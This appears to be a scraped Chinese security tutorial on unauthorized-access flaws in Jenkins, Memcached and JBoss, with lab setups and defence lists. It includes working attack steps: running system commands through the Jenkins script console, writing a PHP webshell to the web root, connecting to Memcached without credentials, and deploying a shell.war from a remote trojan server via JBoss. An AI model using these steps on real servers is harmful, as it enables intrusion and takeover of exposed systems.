文章插图
Jenkins未授权访问写shell点击“脚本命令执行”
文章插图
执行系统命令
println "whoami".execute().text
文章插图
网站路径:/var/www/html (需要具备一定的权限)利用“脚本命令行”写webshell,点击运行没有报错,写入成功
new File ("/var/www/html/shell.php").write('<?php phpinfo(); ?>');
文章插图
访问shell.php
文章插图
更多利用方式可参考:https://www.secpulse.com/archives/2166.html
防御手段-升级版本 。-添加认证,设置强密码复杂度及账号锁定 。-禁止把Jenkins直接暴露在公网 。
Memcached 未授权访问漏洞漏洞简介以及危害 Memcached 是一套常用的 key-value 分布式高速缓存系统,由于 Memcached 的安全设计缺陷没有权限控制模块,所以对公网开放的Memcache服务很容易被攻击者扫描发现,攻击者无需认证通过命令交互可直接读取 Memcached中的敏感信息 。
漏洞利用环境介绍
目标靶机: Windows Server 2012ip地址: 10.0.4.138连接工具:Xshell
环境搭建64位系统 1.4.4版本:http://static.runoob.com/download/memcached-win64-1.4.4-14.zip解压压缩包到指定目录使用管理员权限运行以下命令:memcached.exe -d install
文章插图
启动服务:memcached.exe -d start
文章插图
查看进程服务以及端口netstat -ano | findstr 11211tasklist | findstr memcached
文章插图
未授权访问测试为了方便测试这里将防火墙关闭
telnet 10.0.4.138 11211 或 nc -vv <target> 11211无需用户名密码,可以直接连接memcache 服务的11211端口
文章插图
stats #查看memcache服务状态
文章插图
nmap检测
地址:https://svn.nmap.org/nmap/scripts/memcached-info.nsenmap -p 11211 --script memcached-info <target>
防御手段-设置Memchached只允许本地访问 。-禁止外网访问Memcached 11211端口 。-配置访问控制策略 。-最小化权限运行 。-修改默认端口等 。JBOSS 未授权访问漏洞漏洞简介以及危害 JBoss是一个基于J2EE的开放源代码应用服务器,代码遵循LGPL许可,可以在任何商业应用中免费使用;JBoss也是一个管理EJB的容器和服务器,支持EJB 1.1、EJB 2.0和EJB3规范 。,默认情况下访问 http://ip:8080/jmx-console 就可以浏览 JBoss 的部署管理的信息不需要输入用户名和密码可以直接部署上传木马有安全隐患 。
漏洞利用环境介绍
远程木马服务器: Centos目标靶机: Kaliip地址: 192.168.18.129连接工具:Xshell
环境搭建这里使用我修改过的docker镜像docker search testjbossdocker pull testjboss/jboss:latestdocker imagesdocker run -p 8080:8080 -d 5661a2e31006
文章插图
文章插图
文章插图
未授权访问测试http://192.168.18.129:8080/jmx-console/ 无需认证进入控制页面
文章插图
利用jboss.deployment部署shell点击jboss.deployment进入应用部署页面
文章插图
使用Apache搭建远程木马服务器
文章插图
访问木马地址http://<ip>/shell.war
推荐阅读
- 喝白沙绿茶有什么功效,夏天喝什么茶叶最好
- 柿子怎么催熟最快?
- 中国十大名茶最新排名是怎样的?
- 世界上最敏捷的动物 世界上最活泼的动物
- 金瓜贡茶怎么泡最好喝,狗脑贡茶怎么泡
- 世界上最大的耳朵屎 世界上最大的耳朵的人图片
- 大猩猩体重最重有多少斤 猩猩最大的有多少斤
- 老人冬天心血管疾病高发 该如何预防
- 冬季男性隐忧大 专家:冬季灭男科疾病最高效
- 寒性体质喝什么茶最好,紫罗兰花茶什么人不能喝